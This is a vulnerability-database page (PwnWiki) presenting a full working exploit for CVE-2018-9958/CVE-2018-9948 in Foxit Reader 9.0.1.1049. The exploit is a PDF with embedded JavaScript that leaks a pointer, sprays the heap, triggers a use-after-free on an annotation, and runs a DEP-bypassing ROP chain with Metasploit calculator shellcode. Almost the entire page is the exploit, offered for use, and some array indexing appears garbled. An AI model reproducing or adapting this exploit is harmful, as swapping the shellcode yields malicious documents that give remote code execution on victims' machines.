Loading
0

CVE-2018-9958 Foxit Reader 9.0.1.1049 缓冲区溢出漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

EXP

%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 
2 0 obj
<</S /JavaScript /JS (
/*
#---------------------------------------------------------------------------------------------------#
# Exploit Title   : Foxit Reader RCE with DEP bypass on Heap with shellcode                         #
# Date            : 08/04/2018 (4 Aug)                                                              #
# Exploit Author  : Manoj Ahuje                                                                     #
# Tested on       : Windows 7 Pro (x32)                                                             #
# Software Link   : https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version         : Foxit Reader 9.0.1.1049                                                         #
# CVE             : CVE-2018-9958, CVE-2018-9948                                                    #
# Credits to "Mr_Me" for Reseach and initial exploit                                                #
#---------------------------------------------------------------------------------------------------#
*/
var heap_ptr  = 0;
var foxit_base = 0;

function heap_spray(size){
    var arr = new Array(size);
    for (var i = 0; i < arr.length; i++) {
    
        // re-claim and stack pivot-0x8
        arri = new ArrayBuffer(0x10000-0x8);//0xFFF8
        var claimed = new Int32Array(arri);
        var c_length = claimed.length;
   
/* custom made ROP chain virtualalloc call
   Author: Manoj Ahuje  */
	    
	claimed0x00 = foxit_base + 0x01A65184; //# PUSH EAX # POP ESP # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	claimed0x01 = foxit_base + 0x01A65184;
	claimed0x02 = foxit_base + 0x01A65184;
	claimed0x03 = foxit_base + 0x01A65184;
    claimed0x04 = foxit_base + 0x14f9195;  // # POP EBX # RETN
    claimed0x05 = foxit_base + 0x41414141; // 
	claimed0x06 = foxit_base + 0x1f224fc;  // # ptr to &VirtualProtect()
        claimed0x07 = foxit_base + 0x0e70281;  // # MOV ESI,DWORD PTR DS:EBX # RETN 
        claimed0x08 = foxit_base + 0x1582698;  // # POP EBP # RETN 
        claimed0x09 = foxit_base + 0xa0dbd;    // # & jmp esp 
        claimed0x0a = foxit_base + 0x14ed06d;  // # POP EBX # RETN  
        claimed0x0b = 0x00000201;              // # 0x00000201-> ebx
        claimed0x0c = foxit_base + 0x1e62f7e;  // # POP EDX # RETN  
        claimed0x0d = 0x00000040;              // # 0x00000040-> edx
        claimed0x0e = foxit_base + 0x1ec06a9;  // # POP ECX # RETN 
        claimed0x0f = foxit_base + 0x29bac74;  // # &Writable location 
        claimed0x10 = foxit_base + 0xb971f;    // # POP EDI # RETN  
        claimed0x11 = foxit_base + 0x177769e;  // # RETN (ROP NOP) 
        claimed0x12 = foxit_base + 0x1A89808;  // # POP EAX # RETN 
        claimed0x13 = 0x90909090;              // # nop
        claimed0x14 = foxit_base + 0x129d4f0;  // # PUSHAD # RETN  
	claimed0x15 = 0x90909090;
	claimed0x16 = 0x90909090;
	claimed0x17 = 0x90909090;
	claimed0x18 = 0x90909090;
	claimed0x19 = 0x90909090;
	claimed0x1a = 0x90909090;
	    
//regular CALCULATOR shellcode from msf
	    
        claimed0x1b = 0xe5d9e389;
        claimed0x1c = 0x5af473d9;
        claimed0x1d = 0x4a4a4a4a;
        claimed0x1e = 0x4a4a4a4a;
        claimed0x1f = 0x434a4a4a;
        claimed0x20 = 0x43434343;
        claimed0x21 = 0x59523743;
        claimed0x22 = 0x5058416a;
        claimed0x23 = 0x41304130;
        claimed0x24 = 0x5141416b;
        claimed0x25 = 0x32424132;
        claimed0x26 = 0x42304242;
        claimed0x27 = 0x58424142;
        claimed0x28 = 0x42413850;
        claimed0x29 = 0x49494a75;
        claimed0x2a = 0x4e586b6c;
        claimed0x2b = 0x57306362;
        claimed0x2c = 0x53707770;
        claimed0x2d = 0x6b696e50;
        claimed0x2e = 0x39716455;
        claimed0x2f = 0x6e645050;
        claimed0x30 = 0x6470426b;
        claimed0x31 = 0x434b6c70;
        claimed0x32 = 0x6e6c3662;
        claimed0x33 = 0x7562436b;
        claimed0x34 = 0x526b6e44;
        claimed0x35 = 0x46686452;
        claimed0x36 = 0x5037386f;
        claimed0x37 = 0x6446764a;
        claimed0x38 = 0x4e4f4b71;
        claimed0x39 = 0x354c774c;
        claimed0x3a = 0x776c6131;
        claimed0x3b = 0x374c7672;
        claimed0x3c = 0x5a614a50;
        claimed0x3d = 0x374d746f;
        claimed0x3e = 0x38573971;
        claimed0x3f = 0x30525a62;
        claimed0x40 = 0x6e376652;
        claimed0x41 = 0x6252506b;
        claimed0x42 = 0x624b6c30;
        claimed0x43 = 0x6c4c576a;
        claimed0x44 = 0x476c524b;
        claimed0x45 = 0x6d387461;
        claimed0x46 = 0x43587133;
        claimed0x47 = 0x50513831;
        claimed0x48 = 0x334b6c51;
        claimed0x49 = 0x35506769;
        claimed0x4a = 0x6e534851;
        claimed0x4b = 0x7539576b;
        claimed0x4c = 0x54736948;
        claimed0x4d = 0x4e79637a;
        claimed0x4e = 0x6c64356b;
        claimed0x4f = 0x6a51354b;
        claimed0x50 = 0x39514676;
        claimed0x51 = 0x6f4c6e6f;
        claimed0x52 = 0x444f4831;
        claimed0x53 = 0x4861364d;
        claimed0x54 = 0x6b783447;
        claimed0x55 = 0x69357450;
        claimed0x56 = 0x73337366;
        claimed0x57 = 0x5568494d;
        claimed0x58 = 0x474d436b;
        claimed0x59 = 0x68357454;
        claimed0x5a = 0x4e686364;
        claimed0x5b = 0x6638466b;
        claimed0x5c = 0x59313344;
        claimed0x5d = 0x6c766143;
        claimed0x5e = 0x506c664b;
        claimed0x5f = 0x504b4c4b;
        claimed0x60 = 0x656c4758;
        claimed0x61 = 0x6c436951;
        claimed0x62 = 0x6e34634b;
        claimed0x63 = 0x6831436b;
        claimed0x64 = 0x61694e50;
        claimed0x65 = 0x65746554;
        claimed0x66 = 0x514b5174;
        claimed0x67 = 0x7351734b;
        claimed0x68 = 0x427a6269;
        claimed0x69 = 0x396f6971;
        claimed0x6a = 0x734f5170;
        claimed0x6b = 0x4e6a436f;
        claimed0x6c = 0x7832526b;
        claimed0x6d = 0x316d4e6b;
        claimed0x6e = 0x675a534d;
        claimed0x6f = 0x4f4d6c71;
        claimed0x70 = 0x57324875;
        claimed0x71 = 0x43707770;
        claimed0x72 = 0x61306630;
        claimed0x73 = 0x6e514678;
        claimed0x74 = 0x6e6f706b;
        claimed0x75 = 0x6b6f5967;
        claimed0x76 = 0x784b4f65;
        claimed0x77 = 0x39656d70;
        claimed0x78 = 0x73565032;
        claimed0x79 = 0x6c666c58;
        claimed0x7a = 0x6d6d4d55;
        claimed0x7b = 0x496f494d;
        claimed0x7c = 0x456c6545;
        claimed0x7d = 0x454c7356;
        claimed0x7e = 0x6b306b5a;
        claimed0x7f = 0x5370394b;
        claimed0x80 = 0x4d453445;
        claimed0x81 = 0x6567426b;
        claimed0x82 = 0x70426343;
        claimed0x83 = 0x376a506f;
        claimed0x84 = 0x6b336670;
        claimed0x85 = 0x3045694f;
        claimed0x86 = 0x72313563;
        claimed0x87 = 0x7633654c;
        claimed0x88 = 0x4235754e;
        claimed0x89 = 0x67354558;
        claimed0x8a = 0x00414170;

        for (var j = 0x8b; j < c_length; j++) {
            claimedj = 0x6d616e6a;
        }
    }
}

function leak(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found By: bit from meepwn team
    */

    // alloc
    var a = this.addAnnot({type: "Text"});

    // free
    a.destroy();

    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    // leak the vftable
    var leaked = stolen0 & 0xffff0000;

    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
    foxit_base = leaked-0x01f50000;
}

function reclaim(){

    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arri = new ArrayBuffer(0x60);
        var rop = new Int32Array(arri);
		
        rop0x00 = 0x11000048;
        
        for (var j = 0x01; j < rop.length; j++) {
            ropj = 0x71727374;
        }
    }
}

function trigger_uaf(){
    /*
        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
        Found By: Steven Seeley (mr_me) of Source Incite
    */

    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = 1;
    Object.defineProperties(arr,{
        "0":{ 
            get: function () {

                // free
                that.getAnnot(0, "uaf").destroy();

                // reclaim freed memory
                reclaim();
                return 1; 
            }
        }
    });
    a.point = arr;
}

leak();
heap_spray(0x1000);

trigger_uaf();

)>> trailer <</Root 1 0 R>>

PWNWIK.COM==免费、自由、人人可编辑的漏洞库